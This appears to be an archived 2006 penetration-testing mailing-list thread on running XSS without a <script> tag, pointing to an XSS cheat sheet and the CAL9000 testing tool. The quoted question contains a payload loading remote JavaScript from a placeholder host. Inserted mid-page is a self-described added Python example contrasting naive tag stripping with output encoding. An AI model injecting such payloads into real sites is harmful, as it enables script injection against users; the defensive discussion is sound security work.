RE: XSS - how to run script

From: Joshua Perrymon (josh.perrymon@purehacking.com)
Date: Thu Oct 19 2006 - 19:09:46 EDT


> One of the best repositories of exotic ways to perform XSS
> (with or without evasion, with or without script tag) is the
> XSS cheat sheet:
> http://ha.ckers.org/xss.html

I agree 100%. I would look at the CAL9000 tool on the OWASP website:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It uses RSnake's XSS library and includes it in a website/tool/scratchpad to
use during these app tests. I put CAL9000 on the first version of the OWASP
Live CD, but it won't be released for another month. If you use it, just make
sure your browser is Firefox... It doesn't like Opera or others.

Cheers,

JP

Joshua Perrymon, CE|H, OPST, OPSA

Sr. Security Consultant

-----------------------------------------

Pure Hacking - The Leaders In Internet Security


> -----Original Message-----
> From: listbounce@securityfocus.com
> [mailto:listbounce@securityfocus.com] On Behalf Of A. R.
> Sent: Friday, 20 October 2006 6:23 AM
> Cc: Penetration Testing; Web Application Security
> Subject: Re: XSS - how to run script
>
> One of the best repositories of exotic ways to perform XSS
> (with or without evasion, with or without script tag) is the
> XSS cheat sheet:
> http://ha.ckers.org/xss.html
>
> hth
>
> --
> icesurfer
>
> Tal Argoni wrote:
> > Does anyone have any
> > techniques/knowledge/examples/ideas/etc.
> > of how it is possible to run script
> > without using the <script> tag,
> > and without evasion techniques?
> > <script
> > src=http://www.www.com/XSS.js></script>
> > Thanks a lot
> > LegendaryZion
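The thread is about how script can run without a literal <script> element, which is exactly why filtering that one tag is not a defence. The following is an added example, not code from any poster in this thread, CAL9000 or the cheat sheet: it contrasts a naive script-tag-stripping filter with context-aware output encoding, using the original question's own `<script src=...>` payload as constructed test input. All function names are this example's own.

```python
import html
import json
import re

# Constructed sample input: the payload from the original question.
SCRIPT_TAG = '<script src=http://www.www.com/XSS.js></script>'


def strip_script_tags(untrusted: str) -> str:
    """Naive 'fix': remove only literal <script>...</script> elements.

    Included to show why this is not a defence: every other element,
    attribute and entity the user supplies passes through untouched,
    so the page still renders attacker-controlled markup.
    """
    return re.sub(r'(?is)<script\b[^>]*>.*?</script\s*>', '', untrusted)


def encode_html_text(untrusted: str) -> str:
    """Encode for an HTML text node: < > & " ' all become entities."""
    return html.escape(untrusted, quote=True)


def encode_html_attr(untrusted: str) -> str:
    """Encode for an attribute value and always wrap it in double quotes,
    so an unquoted-attribute context (as in the question's payload) never
    exists in the template."""
    return '"' + html.escape(untrusted, quote=True) + '"'


def encode_js_string(untrusted: str) -> str:
    """Encode for a JavaScript string literal inside an inline script.

    JSON encoding handles quotes and backslashes; < and > are additionally
    written as \\u escapes so the literal can never terminate the enclosing
    <script> block, whatever the input contains.
    """
    return (json.dumps(untrusted)
            .replace('<', '\\u003c')
            .replace('>', '\\u003e'))


def render_comment(username: str, comment: str) -> str:
    """Build a fragment where each untrusted value is encoded for the
    context it lands in (attribute value vs. text node)."""
    return ('<div class="comment" data-user=' + encode_html_attr(username)
            + '>' + encode_html_text(comment) + '</div>')


def contains_markup(fragment: str) -> bool:
    """True if the fragment still carries a raw tag delimiter, i.e. it
    could be parsed as an element rather than as text."""
    return '<' in fragment or '>' in fragment


if __name__ == '__main__':
    # The naive filter removes the script tag but keeps any other element.
    print(repr(strip_script_tags(SCRIPT_TAG)))        # ''
    print(repr(strip_script_tags('<b>hello</b>')))    # '<b>hello</b>'
    # Encoding turns the same payload into inert text.
    print(encode_html_text(SCRIPT_TAG))
    print(encode_js_string('</script>'))
    print(render_comment('a"b', '<i>x</i>'))
```

The design point is that encoding is keyed to the output context, not to a list of bad tags: a value that is safe as escaped text is still unsafe if dropped into an unquoted attribute or an inline script, which is why the example has a separate encoder for each context.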

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:13 EDT